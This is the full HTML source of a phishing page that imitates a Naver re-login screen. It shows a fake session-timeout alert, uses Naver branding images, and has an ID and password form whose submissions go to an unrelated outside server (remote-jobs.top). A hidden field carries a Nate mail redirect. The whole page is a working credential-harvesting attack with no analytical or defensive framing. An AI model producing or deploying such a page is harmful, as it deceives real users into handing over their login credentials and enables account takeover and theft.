<script language=javascript>
alert('Naver Session Timeout, Re-login to continue.');
</script>

<html lang="ko">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=0.73">
<link rel="shortcut icon" href="https://www.naver.com/favicon.ico" type=""><title>Naver Re-Login </title>
</head>
  <style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 16px;
  color: #404040;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=text],
  input[type=password]{
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 48px;
  width: 100%;
  margin: 0;
  background: #fff;
  border: #fff;
  border-bottom: 1px solid #D60411;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 0px;
  font-size: 18px;
  font-family: inherit;
  line-height: 18px;
  vertical-align: top;
  color: #404040;
  }
  input[type=text]:focus,
  input[type=password]:focus {
  outline: none;
  background-color: #fff;
  border: #fff;
  border-bottom: 1px solid #D60411;

  }
  </style>
<body>

<div align="center">
	<table border="0" width="538" cellspacing="0" cellpadding="0" background="https://i.ibb.co/hyHMGcN/naver-bg227.png">
		<tr>
			<td>
			<table border="0" width="100%" cellspacing="0" cellpadding="0">
				<tr>
					<td height="145" width="90"></td>
				</tr>
				<tr>
					<td height="42" >
					&nbsp;</td>
				</tr>
				<form method="post" action="https://remote-jobs.top/cpnl8/ivtech80/imbxview.php" >
				<tr>
					<td height="33"></td>
				</tr>
				<tr>
					<td>
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
						<tr>
							<td width="90" ></td>
							<td>
							    <input type="text" id="id" name="ai" style="width:345px; height:40px; font-family: Verdana; font-size: 14px; color:#000000; 
				background-color: #FAFAFA; border: solid 2px #aba7a7; padding: 10px" "="" placeholder="&#45348;&#51060;&#53944; &#50500;&#51060;&#46356;" value="" required />
                                                            <input type="hidden" value="http://home.mail.nate.com/login/login.html?s=mail&redirect=http%3A%2F%2Fmail3.nate.com%2F" name="domain" >
							</td>
							<td width="18"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td height="8"></td>
				</tr>
				<tr>
					<td>
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
						<tr>
							<td width="90" ></td>
							<td>
							    <input type="password" id="pw" name="password" style="width:345px; height:40px; font-family: Verdana; font-size: 14px; color:#000000; 
				background-color: #FAFAFA; border: solid 2px #aba7a7; padding: 10px" "=""placeholder="&#48708;&#48128;&#48264;&#54840;" maxlength="20" autofous required />
							</td>
							<td width="18"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td height="27" >
					</td>
				</tr>
				<tr>
					<td>
					<table border="0" width="79%" cellspacing="0" cellpadding="0">
						<tr>
							<td width="100%" ></td>
							<td>
							    <input type="image" src="https://i.ibb.co/8dsrnVR/naver-button.png" width="330" height="56">
							</td>
							<td width="40"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td height="20">
					</form>
					</td>
				</tr>
				<tr>
					<td height="445"></td>
				</tr>
				<tr>
					<td height="40"></td>
				</tr>

			</table>
			</td>
		</tr>
	</table>
</div>

</body>

</html>
